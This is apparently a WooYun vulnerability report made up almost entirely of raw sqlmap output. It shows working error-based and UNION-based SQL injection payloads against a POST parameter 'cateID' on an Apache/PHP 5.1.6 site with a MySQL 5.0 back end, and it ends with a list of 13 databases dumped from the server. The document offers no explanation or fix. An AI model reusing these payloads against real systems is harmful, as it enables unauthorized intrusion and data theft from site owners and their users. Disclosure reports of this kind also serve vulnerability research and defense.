WooYun.org

sqlmap identified the following injection points with a total of 892 HTTP(s) requests:
---
Place: POST
Parameter: cateID
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: keyword=1\'&cateID=0 AND (SELECT 9903 FROM(SELECT COUNT(*),CONCAT(0x7163637371,(SELECT (CASE WHEN (9903=9903) THEN 1 ELSE 0 END)),0x7168667971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Action=queryNewsSubmit&submit= %B2%E9 %D1%AF
Type: UNION query
Title: MySQL UNION query (NULL) - 12 columns
Payload: keyword=1\'&cateID=0 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7163637371,0x7271747851674d556c56,0x7168667971),NULL,NULL#&Action=queryNewsSubmit&submit= %B2%E9 %D1%AF
---
web application technology: Apache, PHP 5.1.6
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: cateID
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: keyword=1\'&cateID=0 AND (SELECT 9903 FROM(SELECT COUNT(*),CONCAT(0x7163637371,(SELECT (CASE WHEN (9903=9903) THEN 1 ELSE 0 END)),0x7168667971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Action=queryNewsSubmit&submit= %B2%E9 %D1%AF
Type: UNION query
Title: MySQL UNION query (NULL) - 12 columns
Payload: keyword=1\'&cateID=0 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7163637371,0x7271747851674d556c56,0x7168667971),NULL,NULL#&Action=queryNewsSubmit&submit= %B2%E9 %D1%AF
---
web application technology: Apache, PHP 5.1.6
back-end DBMS: MySQL 5.0
available databases [13]:
[*] 195_car
[*] demo_alan
[*] demo_arc
[*] demo_lanzhou
[*] enableq
[*] i_enableq_com_6kbbs
[*] information_schema
[*] ite_new
[*] lbs_data
[*] mysql
[*] q_autohome
[*] qdoc
[*] test